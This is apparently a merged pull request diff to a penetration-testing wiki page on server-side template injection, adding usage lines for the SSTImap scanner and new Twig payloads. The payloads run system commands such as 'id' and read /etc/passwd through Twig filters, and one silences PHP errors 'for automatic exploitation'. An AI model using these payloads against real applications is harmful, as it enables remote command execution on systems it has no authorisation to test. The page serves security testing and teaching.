Merge pull request #778 from vladko312/patch-1

Added SSTImap tool and Twig payloads

pentesting-web/ssti-server-side-template-injection/README.md

@@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
 tinja url -u "http://example.com/" -d "username=Kirlia"  -c "PHPSESSID=ABC123..."
 ```
 
+### [SSTImap](https://github.com/vladko312/sstimap)
+
+```bash
+python3 sstimap.py -i -l 5
+python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
+python3 sstimap.py -u 'https://example.com/page?name=John' -s
+```
+
 ### [Tplmap](https://github.com/epinna/tplmap)
 
 ```python
@@ -539,6 +547,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id',""]|sort('system')}}
+
+#Hide warnings and errors for automatic exploitation
+{{["error_reporting", "0"]|sort("ini_set")}}
 ```
 
 **Twig - Template format**
@@ -1040,6 +1052,8 @@ If you think it could be useful, read:
 
 {% embed url="https://github.com/Hackmanit/TInjA" %}
 
+{% embed url="https://github.com/vladko312/sstimap" %}
+
 {% embed url="https://github.com/epinna/tplmap" %}
 
 {% embed url="https://github.com/Hackmanit/template-injection-table" %}